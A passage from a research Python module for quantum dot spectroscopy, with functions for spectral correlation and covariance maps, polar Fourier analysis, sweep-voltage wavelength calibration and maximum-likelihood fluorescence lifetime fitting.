savefig=True: #attempt to save figures on the fly\r\n # plt.savefig('E:/Martijn/ETH/results/20200310_PM111_specdiffusion/QD2/Correlation_map_tau'+str(tau)+'_excitation',dpi=800) \r\n elif plot=='cov':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n elif plot=='norm':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau)) \r\n \r\n elif plot=='all':\r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(correlation[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Correlation map. 
tau = '+str(taus[i]))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(covariance[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Covariance map. tau = '+str(tau))\r\n \r\n for i in range(len(taus)):\r\n tau = taus[i]\r\n \r\n plt.figure()\r\n plt.imshow(normalization[i],extent=[minwavspec1,maxwavspec1,maxwavspec2,minwavspec2])\r\n plt.colorbar()\r\n plt.gca().invert_yaxis()\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Wavelength (nm)')\r\n plt.title('Normalization map. tau = '+str(tau))\r\n \r\n else: #means that you dont want to see any plot\r\n pass\r\n \r\n return covariance, normalization, correlation\r\n\r\n \r\ndef wavelengthcorrelation(spectra1,spectra2,exptime):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : Array of spectra to be correlated with spectra2. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n spectra2 : Array of spectra to be correlated with spectra1. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n\r\n Returns\r\n -------\r\n norm : array with intensities, correlated for the whole time range\r\n delaytime : A variable that shifts the correlation graph to almost match completely with tau=0. This can be done because the np.correlate function is to be interpeted as how similar the spectra look after a certain time\r\n\r\n \"\"\"\r\n \r\n spectra1 = spectra1.ravel()\r\n spectra2 = spectra2.ravel()\r\n spectra1norm = (spectra1 - np.mean(spectra1)) / (np.std(spectra1) * (np.sqrt(len(spectra1)-1)))\r\n spectra2norm = (spectra2 - np.mean(spectra2)) / (np.std(spectra2) * (np.sqrt(len(spectra2)-1)))\r\n covariance = np.correlate(spectra1-np.mean(spectra1),spectra2-np.mean(spectra2),mode='same')\r\n correlation = np.correlate(spectra1norm, spectra2norm,mode='same')\r\n \r\n shiftt = np.linspace(-exptime/2,exptime/2,len(spectra1))\r\n correlationcorr = np.zeros(len(correlation))\r\n \r\n for j in range(len(correlationcorr)):\r\n correlationcorr[j] = correlation[j]/(1-np.abs(shiftt[j]/exptime))\r\n \r\n return correlation, shiftt, covariance, correlationcorr\r\n\r\ndef intensitycorrelation(spectra1,spectra2,exptime):\r\n \"\"\"\r\n \r\n\r\n Parameters\r\n ----------\r\n spectra1 : Array of spectra to be correlated with spectra2. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n spectra2 : Array of spectra to be correlated with spectra1. make sure that the shape of the array has wavelengths,time\r\n Array.\r\n\r\n Returns\r\n -------\r\n norm : array with intensities, correlated for the whole time range\r\n delaytime : A variable that shifts the correlation graph to almost match completely with tau=0. 
This can be done because the np.correlate function is to be interpeted as how similar the spectra look after a certain time\r\n spectra1sum, summed intensities without the correlation value\r\n spectra2sum, summed intensities without the correlation value\r\n \"\"\"\r\n \r\n # spectra1 = spectra1.ravel()\r\n # spectra2 = spectra2.ravel()\r\n spectra1sum = np.sum(spectra1,axis=0)\r\n spectra2sum = np.sum(spectra2,axis=0)\r\n spectra1norm = (spectra1sum - np.mean(spectra1sum)) / (np.std(spectra1sum) * (np.sqrt(len(spectra1sum)-1)))\r\n spectra2norm = (spectra2sum - np.mean(spectra2sum)) / (np.std(spectra2sum) * (np.sqrt(len(spectra2sum)-1)))\r\n covariance = np.correlate(spectra1sum - np.mean(spectra1sum),spectra2sum - np.mean(spectra2sum),mode='same')\r\n correlation = np.correlate(spectra1norm, spectra2norm,mode='same')\r\n shiftt = np.linspace(-exptime/2,exptime/2,len(spectra1[0]))\r\n correlationcorr = np.zeros(len(correlation))\r\n for j in range(len(correlationcorr)):\r\n correlationcorr[j] = correlation[j]/(1-np.abs(shiftt[j]/exptime))\r\n return correlation, shiftt, spectra1sum, spectra2sum, covariance, correlationcorr\r\n\r\n\r\ndef wavelengthaverage(wavelengths,array):\r\n \"\"\"Computes the average and find its location in the wavelength list\"\"\"\r\n #is a bit slow\r\n sum1=np.zeros(1)\r\n sum2=np.zeros(1)\r\n wavaverage=np.zeros(1)\r\n for j in range(len(array[0])): #this calculates the average wavelength depending using some kind of wavelength average\r\n for i in range(len(wavelengths)):\r\n temp = wavelengths[i]*array[i,j]\r\n sum1+=temp\r\n temp2 = array[i,j]\r\n sum2+=temp2\r\n wavaverage = sum1/sum2\r\n\r\n idx = (np.abs(wavelengths - wavaverage)).argmin()\r\n return wavaverage,idx,wavelengths[idx]\r\n\r\n\r\n\r\ndef cartesiantopolarcorrelation(cartesiandata,origin,datapoints):\r\n \"\"\"transforms cartesian data into polar data on a rectangular grid.\"\"\"\r\n #converts cartesian covariance or correlation maps to 'rolled out' radii vs theta maps\r\n if datapoints%2==0:\r\n inputdata = np.zeros((len(cartesiandata),datapoints,datapoints))\r\n thetas = np.linspace(-np.pi,np.pi,datapoints,endpoint=False)\r\n radius = np.zeros((datapoints,datapoints))\r\n theta = np.zeros((datapoints,datapoints))\r\n\r\n\r\n for i in range(datapoints): #Radius and theta are only calculated once since the spectra all have the same radii and theta, because I chose the center point to be the same for all\r\n for j in range(datapoints):\r\n radius[i,j]=((i-int(datapoints/2))**2+(j-int(datapoints/2))**2)**(1/2)\r\n theta[i,j] = np.arctan2(i-int(datapoints/2),j-int(datapoints/2)) #calculates the radii and thetas for the data set when centered around the value you are interested in\r\n \r\n maximalradius=int(np.max(radius)) \r\n indexx = np.zeros((len(cartesiandata),int(maximalradius),datapoints))\r\n indexy = np.zeros((len(cartesiandata),int(maximalradius),datapoints))\r\n radii = np.linspace(0,int(maximalradius),int(maximalradius)) \r\n polardata = np.zeros((len(inputdata),int(maximalradius),datapoints))\r\n \r\n for t in range(len(inputdata)):\r\n inputdata[t] = cartesiandata[t][origin-int(datapoints/2):origin+int(datapoints/2),origin-int(datapoints/2):origin+int(datapoints/2)]\r\n for i in range(0,int(maximalradius)): #if you are going to want sampling that has an increased value in the radius driction you should implement a for loop here\r\n \r\n indexx[t,i,:] = radii[i]*np.cos(thetas)\r\n indexy[t,i,:] = radii[i]*np.sin(thetas)\r\n \r\n # for i in range(0,int(maximalradius[t])):\r\n for k in 
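# [editor's note] Self-contained sketch of the normalized autocorrelation plus
# triangular boundary correction used by wavelength/intensitycorrelation above.
# With mode='same', lag tau only has (N - |tau|) overlapping samples, which the
# division by (1 - |tau|/N) compensates for.
import numpy as np

x = np.sin(np.linspace(0.0, 20.0, 500))
x += 0.1 * np.random.default_rng(1).normal(size=x.size)
xn = (x - x.mean()) / (x.std() * np.sqrt(len(x) - 1))
corr = np.correlate(xn, xn, mode='same')
lags = np.arange(len(x)) - len(x) // 2
corr_unbiased = corr / (1.0 - np.abs(lags) / len(x))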
range(datapoints):\r\n polardata[t,i,k] = cartesiandata[t][int(round(indexx[t,i,k]))+origin][int(round(indexy[t,i,k]))+origin] # basically it searches for when the index matches pretty similarly the index around the origin.\r\n # temp1 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin][int(indexy[t,i,k])+origin] \r\n # temp2 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin+1][int(indexy[t,i,k])+origin] \r\n # temp3 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin][int(indexy[t,i,k])+origin+1] \r\n # temp4 = polardata[t,i,k] = cartesiandata[t][int(indexx[t,i,k])+origin+1][int(indexy[t,i,k])+origin+1] \r\n # polardata[t,i,k] = np.mean([temp1,temp2,temp3,temp4]) # so with these you can basically have an average of the closes values in the data. Some figures did not show significant changes\r\n else:\r\n raise ValueError('datapoints must be a multiple of two so that it is centered around even values')\r\n \r\n \r\n \r\n return inputdata,polardata,thetas,maximalradius\r\n #so it returns inputdata that is cropped symmetricaly around the chosen origin with the number of datapoints being an input parameter\r\n\r\n\r\n\r\ndef fouriertransform(polardata,thetas):\r\n #works based on thefunction cartesian to polar converting\r\n #in the script some exampls were given\r\n if polardata.ndim==2: #this \r\n #this function works when the total amount of sampling points on the inner radius is the same as on the outer radius. This does not work when its not because the array then either gets distorted or you have a lot of zeros which may mess up the FT.\r\n \r\n fouriertaudata = [] # in order to retain the imaginary part the data must be calculted in a list. The data is then transformed to an array\r\n fouriertautheta = np.zeros(polardata.shape)\r\n \r\n \r\n for i in range(len(polardata)): #thus does it for all taus\r\n # datapoints = len(polardata[0][i])\r\n datapoints = len(thetas)\r\n fouriertransformdata = []\r\n # for j in range(len(polardata[i])):\r\n # fourtemp = fftpack.fft(polardata[i,:])\r\n fourtemp = fftpack.fft(polardata[i,:])/datapoints #is a normalization factor\r\n fouriertransformdata.append(fourtemp)\r\n # fouriertransformdataarr = np.asarray(fouriertransformdata)\r\n fouriertautheta[i,:] = fftpack.fftfreq(datapoints) * (datapoints)\r\n \r\n fouriertaudata.append(fouriertransformdata)\r\n \r\n fouriertaudata = np.asarray(fouriertaudata)\r\n \r\n fouriertauthetafftshift = np.zeros(polardata.shape)\r\n fouriertaudatarealfftshift = np.zeros(polardata.shape)\r\n fouriertaudataimagfftshift = np.zeros(polardata.shape)\r\n \r\n for i in range(len(polardata)):\r\n # for j in range(len(polardata[i])):\r\n fouriertauthetafftshift[i] = np.fft.fftshift(fouriertautheta[i])\r\n fouriertaudatarealfftshift[i] = np.fft.fftshift(fouriertaudata[i].real)\r\n fouriertaudataimagfftshift[i] = np.fft.fftshift(fouriertaudata[i].imag)\r\n \r\n \r\n elif polardata.ndim==3:\r\n #this function works when the total amount of sampling points on the inner radius is the same as on the outer radius. This does not work when its not because the array then either gets distorted or you have a lot of zeros which may mess up the FT.\r\n \r\n fouriertaudata = [] # in order to retain the imaginary part the data must be calculted in a list. 
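# [editor's note] A compact vectorized version (assumed square input, origin on
# the diagonal) of the nearest-neighbour cartesian-to-polar unwrap above; rows
# index radius, columns index angle.
import numpy as np

def to_polar(img, origin, n_theta, n_r):
    thetas = np.linspace(-np.pi, np.pi, n_theta, endpoint=False)
    rr, tt = np.meshgrid(np.arange(n_r), thetas, indexing='ij')
    ix = np.rint(rr * np.cos(tt)).astype(int) + origin
    iy = np.rint(rr * np.sin(tt)).astype(int) + origin
    return img[ix, iy]  # nearest-neighbour lookup, as in the loop above

img = np.random.default_rng(2).normal(size=(64, 64))
polar = to_polar(img, origin=32, n_theta=90, n_r=20)  # shape (20, 90)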
The data is then transformed to an array\r\n fouriertautheta = np.zeros(polardata.shape)\r\n \r\n \r\n for i in range(len(polardata)): #thus does it for all taus\r\n # datapoints = len(polardata[0][i])\r\n datapoints = len(thetas)\r\n fouriertransformdata = []\r\n for j in range(len(polardata[i])):\r\n # fourtemp = fftpack.fft(polardata[i,j,:])\r\n fourtemp = fftpack.fft(polardata[i,j,:])/datapoints #is a normalization factor\r\n fouriertransformdata.append(fourtemp)\r\n # fouriertransformdataarr = np.asarray(fouriertransformdata)\r\n fouriertautheta[i,j,:] = fftpack.fftfreq(datapoints) * (datapoints)\r\n \r\n fouriertaudata.append(fouriertransformdata)\r\n \r\n fouriertaudata = np.asarray(fouriertaudata)\r\n \r\n fouriertauthetafftshift = np.zeros(polardata.shape)\r\n fouriertaudatarealfftshift = np.zeros(polardata.shape)\r\n fouriertaudataimagfftshift = np.zeros(polardata.shape)\r\n \r\n for i in range(len(polardata)):\r\n for j in range(len(polardata[i])):\r\n fouriertauthetafftshift[i,j] = np.fft.fftshift(fouriertautheta[i,j])\r\n fouriertaudatarealfftshift[i,j] = np.fft.fftshift(fouriertaudata[i,j].real)\r\n fouriertaudataimagfftshift[i,j] = np.fft.fftshift(fouriertaudata[i,j].imag)\r\n \r\n return fouriertautheta, fouriertaudata,fouriertauthetafftshift, fouriertaudatarealfftshift,fouriertaudataimagfftshift\r\n\r\n\r\n\r\ndef wienerprocess(centerstart,scaling,length):\r\n #wiener process is defined in the sense that brownian motion makes independent gaussian steps at each point. The cumulative sum of independent normal random varaibles represents brownian motion.\r\n x = centerstart+scaling*np.cumsum(np.random.randn(length)) \r\n # y = centerstart+scaling*np.cumsum(np.random.randn(length))\r\n return x\r\n\r\ndef find_origin(normalizationdata,guessorigin,wavelengths,prominence=10,width=15):\r\n #might have to play a little with prominence and width due to trion peak\r\n temp = np.sum(normalizationdata,axis=0)\r\n peaks,rest= scipy.signal.find_peaks(temp,width=width,prominence=prominence)\r\n minimalvalue = np.argmin(np.abs(wavelengths[peaks]-guessorigin))\r\n peakprominent = peaks[minimalvalue]\r\n return peakprominent,peaks\r\n\r\ndef Fouriercomponentvstau(fourierdata, fourierangles, selectedradii):\r\n #less of a mess in script when components are matched\r\n component1theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component1data = np.zeros((len(fourierdata),len(selectedradii)))\r\n component2theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component2data = np.zeros((len(fourierdata),len(selectedradii)))\r\n component3theta = np.zeros((len(fourierdata),len(selectedradii)))\r\n component3data = np.zeros((len(fourierdata),len(selectedradii))) \r\n for i in range(len(fourierdata)):\r\n for k in range(0,len(selectedradii)):\r\n selectedradius=selectedradii[k]\r\n for j in range(len(fourierdata[0][0])):\r\n if fourierangles[i][k][j]==0:\r\n \r\n component1theta[i][k]= fourierangles[i][selectedradius][j]\r\n component1data[i][k] = fourierdata[i][selectedradius][j]\r\n \r\n elif fourierangles[i][k][j]==1:\r\n \r\n component2theta[i][k] = fourierangles[i][selectedradius][j]\r\n component2data[i][k] = fourierdata[i][selectedradius][j]\r\n \r\n elif fourierangles[i][k][j]==2: # I think this one is the most interesting for the imaginairy part.\r\n \r\n component3theta[i][k] = fourierangles[i][selectedradius][j]\r\n component3data[i][k] = fourierdata[i][selectedradius][j]\r\n return 
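# [editor's note] Sketch of the angular FFT step above on a single radius ring.
# Dividing by the sample count makes the m=0 coefficient the angular mean, and
# fftfreq(n)*n recovers integer harmonic numbers.
import numpy as np
from scipy import fftpack

n_theta = 90
thetas = np.linspace(-np.pi, np.pi, n_theta, endpoint=False)
ring = 2.0 + np.cos(2 * thetas)                 # mean 2 plus an m=2 harmonic
coeffs = fftpack.fft(ring) / n_theta
harmonics = fftpack.fftfreq(n_theta) * n_theta  # 0, 1, ..., 44, -45, ..., -1
assert np.isclose(coeffs[0].real, 2.0)          # m=0: the angular mean
assert np.isclose(coeffs[2].real, 0.5)          # m=2: cosine amplitude / 2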
component1theta,component1data,component2theta,component2data,component3theta,component3data\r\n \r\ndef find_originsyntheticdata(normalizationdata,guessorigin,wavelengths,prominence=10,width=15):\r\n #due to non amplitude fluctuations which are a little bit random and therefore hard to simulate it actually is the other way around\r\n temp = np.sum(-normalizationdata,axis=0)\r\n peaks,rest= scipy.signal.find_peaks(temp,width=width,prominence=prominence)\r\n minimalvalue = np.argmin(np.abs(wavelengths[peaks]-guessorigin))\r\n peakprominent = peaks[minimalvalue]\r\n return peakprominent,peaks\r\n\r\ndef ljungbox(h,correlations,lags):\r\n #a measure of how intense the autocorrelation values are compared to the standarad deviations\r\n length = len(correlations)\r\n for i in range(h):\r\n temp = correlations[i]**2/(length-lags[i])\r\n sum1 = np.sum(temp) \r\n return sum1\r\n\r\ndef pearsoncorrelation1D(mean):\r\n #mean subtraction of fitted peak maxima. Generates normalized correlations and the 95% confidence interval\r\n mean =mean.ravel()\r\n meansub = mean-np.mean(mean)\r\n corr = np.correlate(meansub,meansub,mode='same')\r\n stdev = np.std(mean)\r\n normcorr = corr/stdev**2/len(mean)\r\n delaytau=np.linspace(-len(mean)/2,len(mean)/2,len(mean))\r\n return normcorr, corr, stdev*2/len(mean)**(1/2),delaytau-0.5\r\n\r\n\r\n# Numba approach\r\ndef repeatvector(vecin,repeattimes):\r\n return np.repeat(vecin,repeattimes) \r\n\r\n#% Parallel Loops\r\ndef repeatvecparallel(k):\r\n return(np.matlib.repmat(calibcoeffs[1]+InVoltage(data[19][range(data[22][k+tau],data[22][k+tau+1]-1)]*dtmacro,Freq,Vpp,Voffset,Verror)*calibcoeffs[0],len(data[22])-tau,1))\r\n\r\ndef histogramexcitationspectra(Freq,Vpp,Voffset,tshift,calibcoeffs,dtmacro,rawdata,originaldata,wavelengthrange,histogram):\r\n#rawdata is the firstphoton of each cycle of interest.Original data is used to not cover more photons when the emission wavelength does not match.\r\n#selecteddata is the index of the ones interested in the firstphotons listed\r\n#originaldata is all the photons collected\r\n \r\n binnedintensities = np.zeros((histogram,len(rawdata)))\r\n binnedwavelengths = np.zeros((histogram,len(rawdata)))\r\n \r\n for i in range(len(rawdata)-1):\r\n originaldataphotonlistindex = np.argmin(np.abs(rawdata-rawdata[i]))\r\n [intensitiestemp,wavelengthstemp] = np.histogram(InVoltagenew_c(dtmacro*originaldata[rawdata[i]:rawdata[originaldataphotonlistindex+1]],Freq,Vpp,Voffset,tshift)*calibcoeffs[0]+calibcoeffs[1],histogram,range=wavelengthrange)\r\n wavelengthstempavg = (wavelengthstemp[:-1]+0.5*(wavelengthstemp[1]-wavelengthstemp[0]))\r\n binnedwavelengths[:,i]= wavelengthstempavg\r\n binnedintensities[:,i]=intensitiestemp\r\n \r\n \r\n return binnedintensities,binnedwavelengths\r\n\r\n\r\ndef histogramexcitationspectranew(Freq,Vpp,Voffset,tshift,calibcoeffs,dtmacro,rawdata,selecteddata,originaldata,wavelengthrange,histogram):\r\n#rawdata is the firstphoton of each cycle of interest.Original data is used to not cover more photons when the emission wavelength does not match.\r\n#selecteddata is the index of the ones interested in the firstphotons listed\r\n#originaldata is all the photons collected\r\n \r\n binnedintensities = np.zeros((histogram,len(rawdata)))\r\n binnedwavelengths = np.zeros((histogram,len(rawdata)))\r\n \r\n for i in range(len(rawdata)-1):\r\n originaldataphotonlistindex = np.argmin(np.abs(selecteddata-rawdata[i]))\r\n [intensitiestemp,wavelengthstemp] = 
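# [editor's note] Quick check (white-noise input) of the 95% band returned by
# pearsoncorrelation1D above: lag-k autocorrelation coefficients of N i.i.d.
# samples scatter with standard error of roughly 1/sqrt(N), so about 95% of
# them should fall within +/- 2/sqrt(N).
import numpy as np

x = np.random.default_rng(3).normal(size=2000)
xc = x - x.mean()
corr = np.correlate(xc, xc, mode='same') / (x.std() ** 2 * len(x))
off_peak = np.delete(corr, len(x) // 2)                 # drop the lag-0 value (~1)
frac = np.mean(np.abs(off_peak) < 2 / np.sqrt(len(x)))  # typically ~0.95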
np.histogram(InVoltagenew_c(dtmacro*originaldata[rawdata[i]:selecteddata[originaldataphotonlistindex+1]],Freq,Vpp,Voffset,tshift)*calibcoeffs[0]+calibcoeffs[1],histogram,range=wavelengthrange)\r\n wavelengthstempavg = (wavelengthstemp[:-1]+0.5*(wavelengthstemp[1]-wavelengthstemp[0]))\r\n binnedwavelengths[:,i]= wavelengthstempavg\r\n binnedintensities[:,i]=intensitiestemp\r\n \r\n \r\n return binnedintensities,binnedwavelengths\r\n#from here on functions I just copied from your functions file but just ran smoother when defined some differences for my pc\r\n \r\n#I defined involtage different with np logical instead of scipy logcial because I got errors all the time. Same then holds for Fintshift\r\ndef InVoltage(t,Freq,VPP,VOffset,Verror):\r\n Period=1/Freq\r\n Bool1=t<=Period/4\r\n Bool2=np.logical_and(t>Period/4,t<=3*Period/4)\r\n Bool3=t>3*Period/4\r\n InVoltage=(VPP/2*t/(Period/4)+VOffset-Verror)*Bool1+(VPP/2-VPP/2*(t-Period/4)/(Period/4)+VOffset+Verror)*Bool2+(-VPP/2+VPP/2*(t-3*Period/4)/(Period/4)+VOffset-Verror)*Bool3\r\n return(InVoltage)\r\n\r\ndef InVoltagenew(t,Freq,VPP,VOffset,tshift):\r\n Period=1/Freq\r\n t=t+tshift\r\n Bool1=t<=Period/4\r\n Bool2=np.logical_and(t>Period/4,t<=3*Period/4)\r\n Bool3=t>3*Period/4\r\n InVoltage=(VPP/2*t/(Period/4)+VOffset)*Bool1+(VPP/2-VPP/2*(t-Period/4)/(Period/4)+VOffset)*Bool2+(-VPP/2+VPP/2*(t-3*Period/4)/(Period/4)+VOffset)*Bool3\r\n return(InVoltage)\r\n\r\nInVoltagenew_c=nb.jit(nopython=True)(InVoltagenew)\r\n\r\ndef Findtshift(Freq,Vpp,Voffset,calibcoeffs,macrocyclelist,dtmacro,matchrange=(500,570),shiftrange=(-6e-4,-2e-4), histbinnumber = 100,steps=30,Debugmode=False):\r\n InVoltagenew_c=nb.jit(nopython=True)(InVoltagenew) #compile to C to speed it up\r\n threshlow=1/Freq/4\r\n threshhigh=3/Freq/4\r\n #Sort microtimes in two halves\r\n Z = np.logical_and(threshlow<(macrocyclelist*dtmacro),(macrocyclelist*dtmacro)<= threshhigh)\r\n tforward=macrocyclelist[np.where(Z)]\r\n tbackward=macrocyclelist[np.where(np.logical_not(Z))]\r\n # histbinnumber = 100 # 608 was for the entire range. For a matchrange of 520 to 590, this should be 4 times as small than the original to prevent aliasing\r\n #First coarse sweep\r\n # matchrange=(500, 570) #Wavelengthrange in which it should match. 
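# [editor's note] A tiny check of the triangular sweep implemented by
# InVoltagenew above (hypothetical sweep settings): rising over the first
# quarter period, falling over the middle half, rising again at the end.
import numpy as np

Freq_demo, Vpp_demo, Voffset_demo = 10.0, 2.0, 0.0   # period T = 0.1 s
t_demo = np.array([0.0, 0.02, 0.05, 0.08])
v_demo = InVoltagenew(t_demo, Freq_demo, Vpp_demo, Voffset_demo, tshift=0.0)
assert np.allclose(v_demo, [0.0, 0.8, 0.0, -0.8])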
Maybe exclude the boundaries a bit\r\n tshift=np.zeros(steps)\r\n autocorr=np.zeros(steps)\r\n for k in tqdm(range(0,steps)):\r\n tshift[k]=shiftrange[0]+(shiftrange[1]-shiftrange[0])*k/steps\r\n lamforward=calibcoeffs[1]+InVoltagenew_c(tforward*dtmacro,Freq,Vpp,Voffset,tshift[k])*calibcoeffs[0]\r\n lambackward=calibcoeffs[1]+InVoltagenew_c(tbackward*dtmacro,Freq,Vpp,Voffset,tshift[k])*calibcoeffs[0]\r\n [ylistforward,xlistforward] = np.histogram(lamforward,histbinnumber,range=matchrange)\r\n # tlistforward = (xlistforward[:-1]+0.5*(xlistforward[1]-xlistforward[0]))\r\n [ylistbackward,xlistbackward] = np.histogram(lambackward,histbinnumber,range=matchrange)\r\n # tlistbackward = (xlistbackward[:-1]+0.5*(xlistbackward[1]-xlistbackward[0]))\r\n autocorr[k]=np.sum(ylistforward*ylistbackward)\r\n if Debugmode==True:\r\n plt.figure()\r\n plt.plot(tshift,autocorr,'.')\r\n optimumshift=tshift[np.argmax(autocorr)]\r\n if Debugmode==True:\r\n tshifttest=optimumshift\r\n lamforward=calibcoeffs[1]+InVoltagenew(tforward*dtmacro,Freq,Vpp,Voffset,tshifttest)*calibcoeffs[0]\r\n lambackward=calibcoeffs[1]+InVoltagenew(tbackward*dtmacro,Freq,Vpp,Voffset,tshifttest)*calibcoeffs[0]\r\n [ylistforward,xlistforward] = np.histogram(lamforward,histbinnumber,range=matchrange)\r\n tlistforward = (xlistforward[:-1]+0.5*(xlistforward[1]-xlistforward[0]))\r\n [ylistbackward,xlistbackward] = np.histogram(lambackward,histbinnumber,range=matchrange)\r\n tlistbackward = (xlistbackward[:-1]+0.5*(xlistbackward[1]-xlistbackward[0]))\r\n plt.figure()\r\n plt.plot(tlistforward,ylistforward,label='Forward sweep')\r\n plt.xlabel('Wavelength (nm)')\r\n plt.ylabel('Intensity')\r\n plt.title('Aligned sweeps')\r\n plt.plot(tlistbackward,ylistbackward,label='Backward sweep')\r\n plt.legend()\r\n return optimumshift\r\n\r\ndef MaxLikelihoodFunction(params,xdata,ydata,const,expterms): \r\n # max likelihood function for A*exp(-t/tau), needed in function MakLikelihoodFit\r\n # params = [A,tau]\r\n A = params[0:expterms]\r\n tau = params[expterms:2*expterms]\r\n model = const*np.ones(len(xdata))\r\n for k in range(len(A)):\r\n # print(A[k])\r\n # print(xdata)\r\n model+=A[k]*np.exp(-(xdata-xdata[0])/tau[k])\r\n # # model = A1*np.exp(-(xdata-xdata[0])/tau1)+const\r\n model [model <= 0] = 1e-10\r\n# # A2 = params[2]\r\n# # tau2 = params[2]\r\n E = 0;\r\n for i in range(len(xdata)):\r\n# # # E = E + ydata[i]*np.log(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+A2*np.exp(-(xdata[i]-xdata[0])/tau2)+const)-(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+A2*np.exp(-(xdata[i]-xdata[0])/tau2)+const)\r\n# # # E = E + ydata[i]*np.log(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+const)-(A1*np.exp(-(xdata[i]-xdata[0])/tau1)+const)\r\n E = E + ydata[i]*np.log(model[i])-(model[i])\r\n return(-E) # This function needs to be MINIMIZED (because of the minus sign) to have the maximum likelihood fit!\r\nMaxLikelihoodFunction_c = nb.jit(nopython=True)(MaxLikelihoodFunction)\r\n\r\n\r\ndef GetLifetime(microtimes,dtmicro,dtmacro,dtfit,tstart=-1,histbinmultiplier=1,ybg=0,plotbool=False,method='ML',expterms=1): \r\n # microtimes = microtimes array with photon events\r\n # dtfit is the time interval considered for the fit [s], tstart [s] is the starting point of the fit within the histogram. If set to -1 it starts at the time with the highest intensity.\r\n # histbinmultiplier is a multiplier. actual binwidth is given as histbinmultiplier*dtmicro[s]\r\n # ybg is the background considered for the fit (CHECK UNITS!!). If set to -1 --> try to estimate background based on last bins. 
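# [editor's note] Toy version of the alignment score maximized by Findtshift
# above: two noisy histograms of the same spectrum, scored by the sum of their
# elementwise product as one is shifted past the other (here via np.roll).
import numpy as np

rng = np.random.default_rng(8)
spec = np.exp(-0.5 * ((np.linspace(500, 570, 100) - 540) / 6.0) ** 2)
fwd = rng.poisson(200 * spec)
bwd = rng.poisson(200 * spec)
shifts = np.arange(-5, 6)
scores = [np.sum(fwd * np.roll(bwd, s)) for s in shifts]
best = shifts[int(np.argmax(scores))]   # ~0 when the sweeps are already aligned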
set to 0 --> no background subtraction\r\n # plotbool: plot histogram with fit\r\n# print('Chosen method is:' + method)\r\n [ylist,xlist] = np.histogram(microtimes,int(dtmacro/(dtmicro*histbinmultiplier)),[0,int(dtmacro/dtmicro)])\r\n tlist = (xlist[:-1]+0.5*(xlist[1]-xlist[0]))*dtmicro*1e9\r\n# print(histbinmultiplier)\r\n istart = int(tstart/dtmicro) #find index of maximum element in ylist\r\n if istart < 0:\r\n istart = ylist.argmax()\r\n iend = istart + int(dtfit/(dtmicro*histbinmultiplier))\r\n if iend>len(tlist):\r\n iend = len(tlist) \r\n \r\n # get background (by simply looking at last ten data points) and substract from intensity data.\r\n if ybg < 0:\r\n ybg = np.mean(ylist[-100:]) # mean background per histogram bin bin of length\r\n \r\n if method == 'ML': #maximum likelihood exponential fit\r\n [tau1fit,A1fit] = MaxLikelihoodFit(tlist,ylist,istart,iend,ybg,False,expterms)\r\n elif method == 'ML_c': #maximum likelihood exponential fit\r\n [tau1fit,A1fit] = MaxLikelihoodFit_c(tlist,ylist,istart,iend,ybg,False,expterms)\r\n elif method == 'WLS': # weighted least squares fit\r\n [taufit,Afit] = WeightedLeastSquareFit(tlist,ylist,istart,iend,ybg,plotbool=False)\r\n else:\r\n taufit = 0; Afit = 0;\r\n print('Error: invalid fit method')\r\n \r\n if plotbool == True:\r\n plt.xlabel('time (ns)')\r\n plt.ylabel('')\r\n plt.semilogy(tlist,ylist,'.',tlist[istart:iend],np.sum(np.array([A1fit[k]*np.exp(-(tlist[istart:iend]-tlist[istart])/tau1fit[k])+ybg*(k<1) for k in range(expterms)]),0))\r\n plt.semilogy([tlist[0],tlist[-1]],[ybg,ybg],'k--')\r\n plt.show()\r\n print('Fitted lifetime:',tau1fit,'ns; Amax:',A1fit)\r\n\r\n\r\n # if plotbool == True:\r\n # # yest = np.array([Aest[k]*np.exp(-(xdata[i]-xdata[0])/tauest[k])+bgcpb for i in range(len(xdata))])\r\n # yest = np.array([np.sum([A1fit[k]*np.exp(-(tlist[istart:iend]-tlist[istart])/tau1fit[k])+ybg*(k<1) for k in range(expterms)]) for i in range(len(xdata))])\r\n \r\n # plt.figure()\r\n # plt.semilogy(tlist,ylist,'.',xdata,yest,[xdata[1],xdata[-1]],[bgcpb,bgcpb],'k--')\r\n # # plt.xlim([xdata[1],xdata[-1]])\r\n # plt.show() \r\n # Amax is the maximum y-value\r\n Amax = np.max(ylist)\r\n \r\n return(tau1fit,A1fit,ybg,istart) \r\n\r\ndef MaxLikelihoodFit_c(tlist,ylist,istart,iend,bgcpb,plotbool=False,expterms=1):\r\n ### 